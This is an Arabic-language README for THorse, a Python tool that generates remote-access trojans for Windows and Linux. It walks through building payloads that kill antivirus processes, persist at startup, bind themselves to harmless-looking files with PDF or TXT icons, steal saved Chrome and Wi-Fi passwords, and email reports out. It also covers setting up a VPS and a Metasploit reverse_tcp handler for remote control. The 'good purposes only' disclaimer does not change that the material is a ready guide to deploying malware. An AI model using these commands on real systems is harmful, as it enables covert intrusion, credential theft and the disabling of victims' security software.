
THorse هو مولد RAT (حصان الإدارة عن بعد) لأنظمة ويندوز/لينكس مكتوب بلغة Python 3.
THorse هو مولد RAT (حصان طروادة للإدارة عن بُعد) لأنظمة ويندوز/لينكس مكتوب بلغة بايثون 3.
هذا السكربت البايثون الصغير يمكنه فعل أعمال رائعة حقًا.
:computer: تم إنشاء هذا المشروع لأغراض جيدة فقط واستخدام شخصي.
يتم توفير هذا البرنامج "كما هو" دون أي ضمان من أي نوع. يمكنك استخدام هذا البرنامج على مسؤوليتك الخاصة. الاستخدام هو المسؤولية الكاملة للمستخدم النهائي. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا البرنامج.
| مصادر استرجاع كلمات المرور المدعومة، يحاول استرجاع كلمات المرور المحفوظة من: |
|---|
| متصفح كروم |
| Wi-Fi |
نعلم جميعًا مدى قوة حمولة الميتربريتر ولكن الحمولة المصنوعة منها لا تزال غير مرضية.
في ويندوز، يرجى تحديد/تعيين مسار Pyinstaller في paygen.py [السطر 14]
المسار الافتراضي هو: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
قم بتغييره وفقًا لنظامك
# تثبيت التبعيات
$ قم بتثبيت أحدث إصدار من بايثون 3.x
# انتقل إلى دليل /opt (اختياري)
$ cd /opt/
# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/thorse.git
# ادخل إلى المستودع
$ cd thorse
# تثبيت التبعيات
$ bash installer_linux.sh
# إذا كنت تواجه أي أخطاء أثناء تنفيذ installer_linux.sh، جرب التثبيت باستخدام installer_linux.py
$ python3 installer_linux.py
$ chmod +x paygen.py
$ python3 paygen.py --help
# صنع الحمولة/حصان الطروادة
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# صنع الحمولة/حصان الطروادة مع قاتل مضاد فيروسات مخصص [افتراضيًا، تمت إضافة العديد من مضادات الفيروسات المعروفة في قائمة Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# صنع الحمولة/حصان الطروادة مع وقت مخصص للثبات
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10
ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا --icon icon/pdf.ico
# 1. قم بإعداد VPS، يمكنك شراء VPS أوبونتو من أي مزود VPS مثل Digital Ocean، Linode، AWS، إلخ
# 2. اتصل بـ VPS الخاص بك باستخدام SSH
$ ssh username@ip_address
# 3. قم بتحديث VPS لينكس الخاص بك
$ sudo apt update
# 4. أضف مستودع Kali Linux
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"
# 5. قم بتثبيت حزمة gnupg
$ sudo apt install gnupg
# 6. أضف المفاتيح العامة لـ Kali
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc
# 7. تحديث VPS
$ sudo apt update
# 8. تعيين أولوية Kali
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"
# 9. تحديث VPS
$ sudo apt update
# 10. تثبيت Metasploit Framework في VPS
$ sudo apt install -t kali-rolling metasploit-framework
# ملاحظة: الخطوات أعلاه تحتاج إلى تنفيذ مرة واحدة فقط
# 11. تثبيت pip3
$ sudo apt install python3-pip
# 12. استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/thorse.git
# 13. ادخل إلى المستودع
$ cd thorse
# 14. تثبيت التبعيات
$ bash installer_linux.sh
# 15. إذا كنت تواجه أي أخطاء أثناء تنفيذ installer_linux.sh، جرب التثبيت باستخدام installer_linux.py
$ python3 installer_linux.py
$ 16. chmod +x paygen.py
$ python3 paygen.py --help
# صنع الحمولة/حصان الطروادة (إذا كنت تريد تجميع RAT لويندوز، قم ببناء RAT على جهاز ويندوز واستخدم VPS للتحكم في RAT عن بُعد)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# صنع الحمولة/حصان الطروادة مع قاتل مضاد فيروسات مخصص [افتراضيًا، العديد من مضادات الفيروسات المعروفة مضافة في Kill_Targets]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# صنع الحمولة/حصان الطروادة مع وقت مخصص للثبات
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10
ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا --icon icon/pdf.ico
# تثبيت التبعيات
$ قم بتثبيت أحدث إصدار من بايثون 3.x
# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/thorse.git
# ادخل إلى المستودع
$ cd thorse
# تثبيت التبعيات
$ python -m pip install -r requirements.txt
# افتح paygen.py في محرر نصوص وقم بتكوين السطر 15، اضبط مسار Pyinstaller، المسار الافتراضي كما يلي:-
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
# الحصول على قائمة المساعدة
$ python paygen.py --help
# صنع الحمولة/حصان الطروادة
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path
# صنع الحمولة/حصان الطروادة مع قاتل مضاد فيروسات مخصص [افتراضيًا، العديد من مضادات الفيروسات المعروفة مضافة في Kill_Targets]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# صنع الحمولة/حصان الطروادة مرتبطًا بملف شرعي [أي ملف .exe، .pdf، .txt إلخ]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt
ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا --icon icon/pdf.ico
تحتاج إلى تثبيت Metasploit-Framework على نظامك لإنشاء الاتصال
الإعدادات الموصى بها، يمكنك محاولة اختبارها مع أي حمولة أخرى في السطر 2
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run








حاليًا يتم صيانة هذا المستودع من قبلي (Pushpender Singh). ولكن إذا كنت تريد أن تصبح مساهمًا، فقم بإضافة ميزة رائعة وقم بعمل طلب سحب (Pull Request)، سأقوم بمراجعته ودمجه في هذا المستودع.
سيتم قبول جميع طلبات السحب من المساهمين إذا كان طلب السحب الخاص بهم يستحق هذا المستودع.
افتح ملف Autostart باستخدام أي محرر نصوص، مسار ملف Autostart: ~/.config/autostart/xinput.desktop
قم بإزالة هذه الأسطر الـ 5:
[Desktop Entry]
Type=Application
X-GNOME-Autostart-enabled=true
Name=Xinput
Exec="destination_file_name"
ملاحظة: destination_file_name هو اسم الملف الخبيث الذي أعطيته لـ TrojanHorse الخاص بك باستخدام معامل -o
أعد تشغيل نظامك ثم احذف الملف الخبيث المخزن في هذا المسار أدناه
المسار الوجهة حيث يتم تخزين TrojanHorse: ~/.config/xnput
مساهمات من أي نوع مرحب بها!
ملاحظة: إذا كان يجب أن تكون في قائمة المساهمين لكننا نسينا ذكرك، فأخبرنا بذلك!
| الاختصار | الاسم الكامل | الوصف |
|---|
| -h | --help | عرض رسالة المساعدة هذه والخروج |
| -k KILL_AV | --kill_av KILL_AV | قاتل مضاد الفيروسات: حدد ملف .exe الخاص بمضاد الفيروسات الذي يجب قتله. مثال: --kill_av cmd.exe |
| -t TIME_IN_SECONDS | --persistence TIME_PERSISTENT | يصبح ثابتًا بعد __ ثانية. الافتراضي = 10 |
| -w | --windows | إنشاء ملف ويندوز تنفيذي. |
| -l | --linux | إنشاء ملف لينكس تنفيذي. |
| -b file.txt | --bind LEGITIMATE_FILE_PATH.pdf | أداة الربط التلقائي: حدد مسار الملف الشرعي. [نظام التشغيل المدعوم: ويندوز] |
| -s | --steal-password | سرقة كلمات المرور المحفوظة من جهاز الضحية [نظام التشغيل المدعوم: ويندوز] |
| -d | --debug | تشغيل الفيروس في المقدمة (Foreground) |
| الاختصار | الاسم الكامل | الوصف |
|---|
| --icon ICON | حدد مسار الأيقونة، أيقونة الملف الخبيث [ملاحظة: يجب أن يكون .ico] | |
| --ip IP_ADDRESS | عنوان البريد الإلكتروني لإرسال التقارير إليه. | |
| --port PORT | منفذ عنوان IP المعطى في وسيط --ip. | |
| -e EMAIL | --email EMAIL | عنوان البريد الإلكتروني لإرسال التقارير إليه. |
| -p PASSWORD | --password PASSWORD | كلمة مرور عنوان البريد الإلكتروني المعطى في وسيط -e. |
| -o OUT | --out OUT | اسم ملف الإخراج. |